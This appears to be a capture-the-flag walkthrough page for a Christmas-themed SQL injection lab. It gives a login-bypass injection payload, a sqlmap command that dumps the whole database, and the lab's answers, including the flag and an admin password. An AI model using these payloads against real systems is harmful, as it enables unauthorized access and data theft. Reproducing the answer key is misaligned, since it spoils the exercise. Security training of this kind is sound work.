search

Someone stole Santa's gift list!

Web Exploitation ; sql injection ; sqli ; sqlmap

hashtag
Video

hashtag
Resources

List of SQL Commands: https://www.codecademy.com/articles/sql-commandsarrow-up-right

Check out this cheat sheet: swisskyrepo/PayloadsAllTheThingsarrow-up-right

Payload list: payloadbox/sql-injection-payload-listarrow-up-right

In-depth SQL Injection tutorial: SQLi Basicsarrow-up-right

SQLMAP cheatsheetarrow-up-right

hashtag
Challenge

hashtag
Without using directory brute forcing, what's Santa's secret login panel?

circle-check

/santapanel

hashtag
Visit Santa's secret login panel and bypass the login using SQLi

Username 'or true --

Password '--

circle-check

No answer needed

hashtag
How many entries are there in the gift database?

Save Item

sqlmap -r santapanel.req --tamper=space2comment --dump-all -dbms sqlite

circle-check

22

hashtag
What did Paul ask for?

circle-check

Github Ownership

hashtag
What is the flag?

circle-check

thmfox{All_I_Want_for_Christmas_Is_You}

hashtag
What is admin's password?

circle-check

EhCNSWzzFP6sc7gB

PreviousSanta's watchingNextBe careful with what you wish on a Christmas night

Last updated